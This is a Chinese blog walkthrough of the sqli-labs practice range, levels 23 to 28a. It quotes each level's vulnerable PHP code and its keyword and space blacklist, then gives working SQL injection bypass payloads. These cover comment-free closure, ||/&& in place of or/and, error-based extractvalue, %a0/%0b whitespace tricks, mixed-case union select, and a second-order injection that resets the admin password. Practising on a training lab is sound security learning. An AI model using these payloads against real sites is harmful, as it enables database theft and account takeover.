靶场练习-Sqli-labs通关记录(get型绕过)(23-28a关)
0x00 实验环境
本地:Win 10
靶场:sqli-labs(共65关,每日一关)
0x02 通关记录
简介:一天一关!
(23)第二十三关:
看看源代码:
源码里,将注释符替换为了空,就是# 、--+这两个注释符。
if(isset($_GET['id'])) { $id=$_GET['id']; //filter the comments out so as to comments should not work $reg = "/#/"; $reg1 = "/--/"; $replace = ""; $id = preg_replace($reg, $replace, $id); $id = preg_replace($reg1, $replace, $id); //logging the connection parameters to a file for analysis. $fp=fopen('result.txt','a'); fwrite($fp,'ID:'.$id."\n"); fclose($fp); // connectivity $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; $result=mysql_query($sql); $row = mysql_fetch_array($result);
我们在数据库里输入语句试试:
查询id:
union联合查询:
如果后面不让你输入注释符了,为何不进行语句的正常查询呢!
如下所示,后面就正常查询:只要语句是闭合的,不用使用#号或者--+都不会报错
$sql="SELECT * FROM users WHERE id='$id' union select 1,2,'3' LIMIT 0,1";
因此可以构造:
-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_name="users"),'3
尝试一下:
通关成功!
(24)第二十四关:
是考查的二次注入:关于二次注入,可查看我写的这篇文章:二次注入原理及防御
if($pass==$re_pass) { $sql = "UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr_pass' "; $res = mysql_query($sql) or die('You tried to be smart, Try harder!!!! :( '); $row = mysql_affected_rows(); echo '<font size="3" color="#FFFF00">'; echo '<center>'; if($row==1) { echo "Password successfully updated"; }
修改密码时admin'#用户密码时,因为'#闭合了语句,变成了修改admin的密码:
$sql = "UPDATE users SET PASSWORD='123456' where username='admin'#' and password='$curr_pass' ";
因此此关不再赘述。
(25)第二十五关:
// connectivity $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; $result=mysql_query($sql); $row = mysql_fetch_array($result); if($row) { echo "<font size='5' color= '#99FF00'>"; echo 'Your Login name:'. $row['username']; echo "<br>"; echo 'Your Password:' .$row['password']; echo "</font>"; } else { echo '<font color= "#FFFF00">'; print_r(mysql_error()); echo "</font>"; } } else { echo "Please input the ID as parameter with numeric value"; } function blacklist($id) { $id= preg_replace('/or/i',"", $id); //strip out OR (non case sensitive) $id= preg_replace('/AND/i',"", $id); //Strip out AND (non case sensitive) return $id; }
看源码是对or与and进行了过滤,对这些进行了过滤的可以查看我之前写的一篇文章:SQL注入绕过waf的一万种姿势
and的话可以用&&进行代替试试,or可以用||进行代替:
(1)大小写变形 Or,OR,oR
(2)编码,hex,urlencode
(3)添加注释/*or*/
(4)利用符号 and=&& or=||
1'|| extractvalue(1,concat(0x7e,database()))--+
通关成功!
(25a)第二十五A关:
// connectivity $sql="SELECT * FROM users WHERE id=$id LIMIT 0,1"; $result=mysql_query($sql); $row = mysql_fetch_array($result); if($row) { echo "<font size='5' color= '#99FF00'>"; echo 'Your Login name:'. $row['username']; //echo 'YOU ARE IN ........'; echo "<br>"; echo 'Your Password:' .$row['password']; echo "</font>"; } else { echo '<font size="5" color="#FFFF00">'; //echo 'You are in...........'; //print_r(mysql_error()); //echo "You have an error in your SQL syntax"; echo "</br></font>"; echo '<font color= "#0000ff" font size= 3>'; } } else { echo "Please input the ID as parameter with numeric value"; } function blacklist($id) { $id= preg_replace('/or/i',"", $id); //strip out OR (non case sensitive) $id= preg_replace('/AND/i',"", $id); //Strip out AND (non case sensitive) return $id; }
这关就是没有单引号了,同时不会进行报错:用You are in .......来代替了,其他跟25关差不多,不能用报错注入,只能用延时注入与联合注入试试:
-1 union select 1,database(),3#
-1 || 1=1#
(26)第二十六关:
过滤了空格:
过滤了or、and、/、--、#、空格、\\等字符:
// connectivity $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; $result=mysql_query($sql); $row = mysql_fetch_array($result); if($row) { echo "<font size='5' color= '#99FF00'>"; echo 'Your Login name:'. $row['username']; echo "<br>"; echo 'Your Password:' .$row['password']; echo "</font>"; } else { echo '<font color= "#FFFF00">'; print_r(mysql_error()); echo "</font>"; } } else { echo "Please input the ID as parameter with numeric value";} function blacklist($id) { $id= preg_replace('/or/i',"", $id); //strip out OR (non case sensitive) $id= preg_replace('/and/i',"", $id); //Strip out AND (non case sensitive) $id= preg_replace('/[\/\*]/',"", $id); //strip out /* $id= preg_replace('/[--]/',"", $id); //Strip out -- $id= preg_replace('/[#]/',"", $id); //Strip out # $id= preg_replace('/[\s]/',"", $id); //Strip out spaces $id= preg_replace('/[\/\\\\]/',"", $id); //Strip out slashes return $id; }
%09 TAB 键(水平)
%0a 新建一行
%0c 新的一页
%0d return 功能
%0b TAB 键(垂直)
%a0 空格
使用联合查询(5.2版本的php亲测%a0是可以替换空格的,5.4、5.5的不行):
' union select 1,database(),3--+
替换为:
1000000000%27%a0union%a0select%a01,2,%273
(27)第二十七关:
27关过滤得更多了:
// connectivity $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; $result=mysql_query($sql); $row = mysql_fetch_array($result); if($row) { echo "<font size='5' color= '#99FF00'>"; echo 'Your Login name:'. $row['username']; echo "<br>"; echo 'Your Password:' .$row['password']; echo "</font>"; } else { echo '<font color= "#FFFF00">'; print_r(mysql_error()); echo "</font>"; } } else { echo "Please input the ID as parameter with numeric value";} function blacklist($id) { $id= preg_replace('/[\/\*]/',"", $id); //strip out /* $id= preg_replace('/[--]/',"", $id); //Strip out --. $id= preg_replace('/[#]/',"", $id); //Strip out #. $id= preg_replace('/[ +]/',"", $id); //Strip out spaces. $id= preg_replace('/select/m',"", $id); //Strip out spaces. $id= preg_replace('/[ +]/',"", $id); //Strip out spaces. $id= preg_replace('/union/s',"", $id); //Strip out union $id= preg_replace('/select/s',"", $id); //Strip out select $id= preg_replace('/UNION/s',"", $id); //Strip out UNION $id= preg_replace('/SELECT/s',"", $id); //Strip out SELECT $id= preg_replace('/Union/s',"", $id); //Strip out Union $id= preg_replace('/Select/s',"", $id); //Strip out select return $id; }
过滤了/*、--、#、空格、select、union、UNION、SELECT、Union、Select这些。
试试用大小写或者重复进行绕过:(基于5.4、5.5的PHP版本;5.2的突然不行了,有点离谱!)
-100'%0BunIon%0BSelEcT%0B1,database(),'3
用%0b绕过空格,其他的关键字大小写乱打就行了:
(26a)第二十六A关:
因为太happy把26a关忘记了,这里补一下:
// connectivity $sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1"; $result=mysql_query($sql); $row = mysql_fetch_array($result); if($row) { echo "<font size='5' color= '#99FF00'>"; echo 'Your Login name:'. $row['username']; echo "<br>"; echo 'Your Password:' .$row['password']; echo "</font>"; } else { echo '<font color= "#FFFF00">'; //print_r(mysql_error()); echo "</font>"; } } else { echo "Please input the ID as parameter with numeric value";} function blacklist($id) { $id= preg_replace('/or/i',"", $id); //strip out OR (non case sensitive) $id= preg_replace('/and/i',"", $id); //Strip out AND (non case sensitive) $id= preg_replace('/[\/\*]/',"", $id); //strip out /* $id= preg_replace('/[--]/',"", $id); //Strip out -- $id= preg_replace('/[#]/',"", $id); //Strip out # $id= preg_replace('/[\s]/',"", $id); //Strip out spaces $id= preg_replace('/[\s]/',"", $id); //Strip out spaces $id= preg_replace('/[\/\\\\]/',"", $id); //Strip out slashes return $id; }
过滤了or、and、/*、--、#、空格、\\等,然后闭合语句改为')后面闭合用(',空格用%a0 (基于5.2,其实我觉得吧%0b跟%a0都是可以在5.2-5.5版本使用的,可能是其他原因,这个之后会单独列一篇针对版本的绕过)
不用不就可以了吗!没看答案自己做出来了:
-1000000')%a0union%a0select%a01,2,('3
(27a)第二十七A关:
又是union跟select
过滤了/*、--、#、空格、union、select、UINON、SELECT、Union、Select等
if(isset($_GET['id'])) { $id=$_GET['id']; //logging the connection parameters to a file for analysis. $fp=fopen('result.txt','a'); fwrite($fp,'ID:'.$id."\n"); fclose($fp); //fiddling with comments $id= blacklist($id); //echo "<br>"; //echo $id; //echo "<br>"; $hint=$id; $id = '"' .$id. '"'; // connectivity $sql="SELECT * FROM users WHERE id=$id LIMIT 0,1"; $result=mysql_query($sql); $row = mysql_fetch_array($result); if($row) { echo "<font size='5' color= '#99FF00'>"; echo 'Your Login name:'. $row['username']; echo "<br>"; echo 'Your Password:' .$row['password']; echo "</font>"; } else { echo '<font color= "#FFFF00">'; //print_r(mysql_error()); echo "</font>"; } } else { echo "Please input the ID as parameter with numeric value";} function blacklist($id) { $id= preg_replace('/[\/\*]/',"", $id); //strip out /* $id= preg_replace('/[--]/',"", $id); //Strip out --. $id= preg_replace('/[#]/',"", $id); //Strip out #. $id= preg_replace('/[ +]/',"", $id); //Strip out spaces. $id= preg_replace('/select/m',"", $id); //Strip out spaces. $id= preg_replace('/[ +]/',"", $id); //Strip out spaces. $id= preg_replace('/union/s',"", $id); //Strip out union $id= preg_replace('/select/s',"", $id); //Strip out select $id= preg_replace('/UNION/s',"", $id); //Strip out UNION $id= preg_replace('/SELECT/s',"", $id); //Strip out SELECT $id= preg_replace('/Union/s',"", $id); //Strip out Union $id= preg_replace('/Select/s',"", $id); //Strip out Select return $id; }
跟27关唯一不同是没有逗号闭合了,使用的"进行闭合:(基于5.2以上的php版本,有点奇怪,明明没使用过滤逗号的函数,还是有问题,算了,这个先不深入研究)
-1000"%0BUnIon%0BSeLect%0B1,2,"3
(28)第二十八关:
// connectivity $sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1"; $result=mysql_query($sql); $row = mysql_fetch_array($result); if($row) { echo "<font size='5' color= '#99FF00'>"; echo 'Your Login name:'. $row['username']; echo "<br>"; echo 'Your Password:' .$row['password']; echo "</font>"; } else { echo '<font color= "#FFFF00">'; //print_r(mysql_error()); echo "</font>"; } } else { echo "Please input the ID as parameter with numeric value";} function blacklist($id) { $id= preg_replace('/[\/\*]/',"", $id); //strip out /* $id= preg_replace('/[--]/',"", $id); //Strip out --. $id= preg_replace('/[#]/',"", $id); //Strip out #. $id= preg_replace('/[ +]/',"", $id); //Strip out spaces. //$id= preg_replace('/select/m',"", $id); //Strip out spaces. $id= preg_replace('/[ +]/',"", $id); //Strip out spaces. $id= preg_replace('/union\s+select/i',"", $id); //Strip out UNION & SELECT. return $id; }
这次是只要是跟Union和select有关的,都不行了,然后闭合还使用的')
28关有bug,等我回头再试试!
(28a)第二十八A关:
我是真的有点怕bug,一些玄学问题解决不掉*-*
// connectivity $sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1"; $result=mysql_query($sql); $row = mysql_fetch_array($result); if($row) { echo "<font size='5' color= '#99FF00'>"; echo 'Your Login name:'. $row['username']; echo "<br>"; echo 'Your Password:' .$row['password']; echo "</font>"; } else { echo '<font color= "#FFFF00">'; //print_r(mysql_error()); echo "</font>"; } } else { echo "Please input the ID as parameter with numeric value";} function blacklist($id) { //$id= preg_replace('/[\/\*]/',"", $id); //strip out /* //$id= preg_replace('/[--]/',"", $id); //Strip out --. //$id= preg_replace('/[#]/',"", $id); //Strip out #. //$id= preg_replace('/[ +]/',"", $id); //Strip out spaces. //$id= preg_replace('/select/m',"", $id); //Strip out spaces. //$id= preg_replace('/[ +]/',"", $id); //Strip out spaces. $id= preg_replace('/union\s+select/i',"", $id); //Strip out spaces. return $id; }
100%27)%a0unIon%a0sElect%a01,@@basedir,3||(%271
按道理我上面的注入语句是没错的,这28关确实难到我了!故跳过!遇到困难睡大觉!
